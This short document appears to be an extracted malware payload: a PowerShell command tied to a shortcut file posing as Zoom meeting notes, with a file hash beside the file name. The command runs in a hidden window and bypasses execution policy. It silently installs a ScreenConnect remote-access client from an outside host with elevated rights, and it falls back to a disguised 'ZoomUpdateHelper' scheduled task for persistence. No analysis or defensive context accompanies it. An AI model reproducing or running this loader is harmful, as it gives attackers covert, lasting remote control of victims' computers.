powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command $u='https://ridgevico.com/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest'; $msiArgs=@('/i',$u,'/qn','/quiet','/norestart','REBOOT=ReallySuppress'); $hide=Join-Path $env:APPDATA 'Zoom\Plugins'; if(-not(Test-Path $hide)){New-Item -ItemType Directory -Path $hide -Force|Out-Null}; $ok=$false; foreach($try in 1..3){ $p=Start-Process msiexec.exe -ArgumentList $msiArgs -Verb RunAs -Wait -PassThru -WindowStyle Hidden; if($p.ExitCode -eq 0 -or $p.ExitCode -eq 3010){$ok=$true;break}; Start-Sleep -Seconds 8 }; if(-not $ok){ $a=New-ScheduledTaskAction -Execute 'msiexec.exe' -Argument ($msiArgs -join ' '); $t=New-ScheduledTaskTrigger -AtLogOn; $s=New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -StartWhenAvailable; Register-ScheduledTask -TaskName 'ZoomUpdateHelper' -Action $a -Trigger $t -Settings $s -RunLevel Highest -Force|Out-Null }; exit
8bca62ec55d3f0a8870fb630f58e12b8 > Zoom_Meeting_Notes_docx.lnk